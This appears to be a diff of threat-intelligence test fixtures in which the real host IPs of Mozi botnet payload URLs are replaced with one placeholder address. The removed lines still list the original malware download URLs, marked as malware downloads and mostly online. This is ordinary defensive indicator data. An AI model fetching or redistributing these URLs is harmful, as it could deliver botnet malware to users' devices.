@@ -10035,18 +10035,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.141.10.143:32907/Mozi.m", + "original": "http://89.160.20.156:32907/Mozi.m", "scheme": "http", "port": 32907, - "domain": "222.141.10.143", - "full": "http://222.141.10.143:32907/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32907/Mozi.m" }, - "ip": "222.141.10.143" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693288260Z", - "original": "{\"id\":\"961338\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961338/\",\"url\":\"http://222.141.10.143:32907/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.141.10.143\",\"date_added\":\"2021-01-14 19:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025986300Z", + "original": "{\"id\":\"961338\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961338/\",\"url\":\"http://89.160.20.156:32907/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10084,18 +10084,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://27.198.22.182:57568/Mozi.a", + "original": "http://89.160.20.156:57568/Mozi.a", "scheme": "http", "port": 57568, - "domain": "27.198.22.182", - "full": "http://27.198.22.182:57568/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57568/Mozi.a" }, - "ip": "27.198.22.182" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693291726Z", - "original": "{\"id\":\"961336\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961336/\",\"url\":\"http://27.198.22.182:57568/Mozi.a\",\"url_status\":\"online\",\"host\":\"27.198.22.182\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025993200Z", + "original": "{\"id\":\"961336\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961336/\",\"url\":\"http://89.160.20.156:57568/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10133,18 +10133,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.136.106:40740/Mozi.m", + "original": "http://89.160.20.156:40740/Mozi.m", "scheme": "http", "port": 40740, - "domain": "42.224.136.106", - "full": "http://42.224.136.106:40740/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40740/Mozi.m" }, - "ip": "42.224.136.106" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693295053Z", - "original": "{\"id\":\"961337\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961337/\",\"url\":\"http://42.224.136.106:40740/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.136.106\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026000400Z", + "original": "{\"id\":\"961337\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961337/\",\"url\":\"http://89.160.20.156:40740/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10182,18 +10182,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.41.9:35927/Mozi.m", + "original": "http://89.160.20.156:35927/Mozi.m", "scheme": "http", "port": 35927, - "domain": "42.224.41.9", - "full": "http://42.224.41.9:35927/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35927/Mozi.m" }, - "ip": "42.224.41.9" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693298439Z", - "original": "{\"id\":\"961331\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961331/\",\"url\":\"http://42.224.41.9:35927/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.41.9\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026007400Z", + "original": "{\"id\":\"961331\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961331/\",\"url\":\"http://89.160.20.156:35927/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10231,18 +10231,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://39.77.229.65:55558/Mozi.m", + "original": "http://89.160.20.156:55558/Mozi.m", "scheme": "http", "port": 55558, - "domain": "39.77.229.65", - "full": "http://39.77.229.65:55558/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55558/Mozi.m" }, - "ip": "39.77.229.65" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693302036Z", - "original": "{\"id\":\"961332\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961332/\",\"url\":\"http://39.77.229.65:55558/Mozi.m\",\"url_status\":\"online\",\"host\":\"39.77.229.65\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026014300Z", + "original": "{\"id\":\"961332\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961332/\",\"url\":\"http://89.160.20.156:55558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10280,18 +10280,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.209.112.112:60558/Mozi.m", + "original": "http://89.160.20.156:60558/Mozi.m", "scheme": "http", "port": 60558, - "domain": "27.209.112.112", - "full": "http://27.209.112.112:60558/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60558/Mozi.m" }, - "ip": "27.209.112.112" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693305432Z", - "original": "{\"id\":\"961333\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961333/\",\"url\":\"http://27.209.112.112:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.209.112.112\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026021300Z", + "original": "{\"id\":\"961333\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961333/\",\"url\":\"http://89.160.20.156:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10329,18 +10329,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.139.17.39:59624/Mozi.m", + "original": "http://89.160.20.156:59624/Mozi.m", "scheme": "http", "port": 59624, - "domain": "222.139.17.39", - "full": "http://222.139.17.39:59624/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59624/Mozi.m" }, - "ip": "222.139.17.39" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693308788Z", - "original": "{\"id\":\"961334\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961334/\",\"url\":\"http://222.139.17.39:59624/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.139.17.39\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026028300Z", + "original": "{\"id\":\"961334\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961334/\",\"url\":\"http://89.160.20.156:59624/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10378,18 +10378,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.100.168:39386/Mozi.m", + "original": "http://89.160.20.156:39386/Mozi.m", "scheme": "http", "port": 39386, - "domain": "42.230.100.168", - "full": "http://42.230.100.168:39386/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39386/Mozi.m" }, - "ip": "42.230.100.168" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693312085Z", - "original": "{\"id\":\"961335\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961335/\",\"url\":\"http://42.230.100.168:39386/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.100.168\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026035200Z", + "original": "{\"id\":\"961335\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961335/\",\"url\":\"http://89.160.20.156:39386/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10427,18 +10427,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.78.100:46289/Mozi.m", + "original": "http://89.160.20.156:46289/Mozi.m", "scheme": "http", "port": 46289, - "domain": "182.121.78.100", - "full": "http://182.121.78.100:46289/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46289/Mozi.m" }, - "ip": "182.121.78.100" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693315251Z", - "original": "{\"id\":\"961322\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961322/\",\"url\":\"http://182.121.78.100:46289/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.78.100\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026042300Z", + "original": "{\"id\":\"961322\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961322/\",\"url\":\"http://89.160.20.156:46289/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10476,18 +10476,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://139.190.238.2:34951/Mozi.m", + "original": "http://89.160.20.156:34951/Mozi.m", "scheme": "http", "port": 34951, - "domain": "139.190.238.2", - "full": "http://139.190.238.2:34951/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34951/Mozi.m" }, - "ip": "139.190.238.2" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693318717Z", - "original": "{\"id\":\"961323\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961323/\",\"url\":\"http://139.190.238.2:34951/Mozi.m\",\"url_status\":\"offline\",\"host\":\"139.190.238.2\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026049300Z", + "original": "{\"id\":\"961323\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961323/\",\"url\":\"http://89.160.20.156:34951/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10525,18 +10525,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.122.75:47594/Mozi.m", + "original": "http://89.160.20.156:47594/Mozi.m", "scheme": "http", "port": 47594, - "domain": "186.33.122.75", - "full": "http://186.33.122.75:47594/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47594/Mozi.m" }, - "ip": "186.33.122.75" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693322654Z", - "original": "{\"id\":\"961324\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961324/\",\"url\":\"http://186.33.122.75:47594/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.122.75\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026056200Z", + "original": "{\"id\":\"961324\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961324/\",\"url\":\"http://89.160.20.156:47594/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10574,18 +10574,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.32.64:55792/Mozi.m", + "original": "http://89.160.20.156:55792/Mozi.m", "scheme": "http", "port": 55792, - "domain": "182.121.32.64", - "full": "http://182.121.32.64:55792/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55792/Mozi.m" }, - "ip": "182.121.32.64" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693328686Z", - "original": "{\"id\":\"961325\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961325/\",\"url\":\"http://182.121.32.64:55792/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.32.64\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026063200Z", + "original": "{\"id\":\"961325\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961325/\",\"url\":\"http://89.160.20.156:55792/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10623,18 +10623,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.9.207.172:35271/Mozi.m", + "original": "http://89.160.20.156:35271/Mozi.m", "scheme": "http", "port": 35271, - "domain": "123.9.207.172", - "full": "http://123.9.207.172:35271/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35271/Mozi.m" }, - "ip": "123.9.207.172" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693332713Z", - "original": "{\"id\":\"961326\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961326/\",\"url\":\"http://123.9.207.172:35271/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.207.172\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026070Z", + "original": "{\"id\":\"961326\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961326/\",\"url\":\"http://89.160.20.156:35271/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10672,18 +10672,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.122.231:36300/Mozi.m", + "original": "http://89.160.20.156:36300/Mozi.m", "scheme": "http", "port": 36300, - "domain": "186.33.122.231", - "full": "http://186.33.122.231:36300/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36300/Mozi.m" }, - "ip": "186.33.122.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693336951Z", - "original": "{\"id\":\"961327\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961327/\",\"url\":\"http://186.33.122.231:36300/Mozi.m\",\"url_status\":\"offline\",\"host\":\"186.33.122.231\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026076900Z", + "original": "{\"id\":\"961327\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961327/\",\"url\":\"http://89.160.20.156:36300/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10721,18 +10721,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.128.242:60680/Mozi.m", + "original": "http://89.160.20.156:60680/Mozi.m", "scheme": "http", "port": 60680, - "domain": "182.121.128.242", - "full": "http://182.121.128.242:60680/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60680/Mozi.m" }, - "ip": "182.121.128.242" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693340568Z", - "original": "{\"id\":\"961328\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961328/\",\"url\":\"http://182.121.128.242:60680/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.128.242\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026083900Z", + "original": "{\"id\":\"961328\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961328/\",\"url\":\"http://89.160.20.156:60680/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10770,18 +10770,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://175.172.66.144:51132/Mozi.a", + "original": "http://89.160.20.156:51132/Mozi.a", "scheme": "http", "port": 51132, - "domain": "175.172.66.144", - "full": "http://175.172.66.144:51132/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51132/Mozi.a" }, - "ip": "175.172.66.144" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693344616Z", - "original": "{\"id\":\"961329\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961329/\",\"url\":\"http://175.172.66.144:51132/Mozi.a\",\"url_status\":\"online\",\"host\":\"175.172.66.144\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026090800Z", + "original": "{\"id\":\"961329\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961329/\",\"url\":\"http://89.160.20.156:51132/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10819,18 +10819,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.116.99.242:39049/Mozi.m", + "original": "http://89.160.20.156:39049/Mozi.m", "scheme": "http", "port": 39049, - "domain": "182.116.99.242", - "full": "http://182.116.99.242:39049/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39049/Mozi.m" }, - "ip": "182.116.99.242" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693348152Z", - "original": "{\"id\":\"961330\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961330/\",\"url\":\"http://182.116.99.242:39049/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.99.242\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026097700Z", + "original": "{\"id\":\"961330\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961330/\",\"url\":\"http://89.160.20.156:39049/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10868,18 +10868,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.248.62.107:57455/Mozi.m", + "original": "http://89.160.20.156:57455/Mozi.m", "scheme": "http", "port": 57455, - "domain": "117.248.62.107", - "full": "http://117.248.62.107:57455/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57455/Mozi.m" }, - "ip": "117.248.62.107" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693351789Z", - "original": "{\"id\":\"961321\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961321/\",\"url\":\"http://117.248.62.107:57455/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.248.62.107\",\"date_added\":\"2021-01-14 19:49:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026104600Z", + "original": "{\"id\":\"961321\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961321/\",\"url\":\"http://89.160.20.156:57455/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10917,18 +10917,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.172.10:32823/Mozi.m", + "original": "http://89.160.20.156:32823/Mozi.m", "scheme": "http", "port": 32823, - "domain": "117.222.172.10", - "full": "http://117.222.172.10:32823/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32823/Mozi.m" }, - "ip": "117.222.172.10" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693355075Z", - "original": "{\"id\":\"961320\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961320/\",\"url\":\"http://117.222.172.10:32823/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.222.172.10\",\"date_added\":\"2021-01-14 19:49:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026111400Z", + "original": 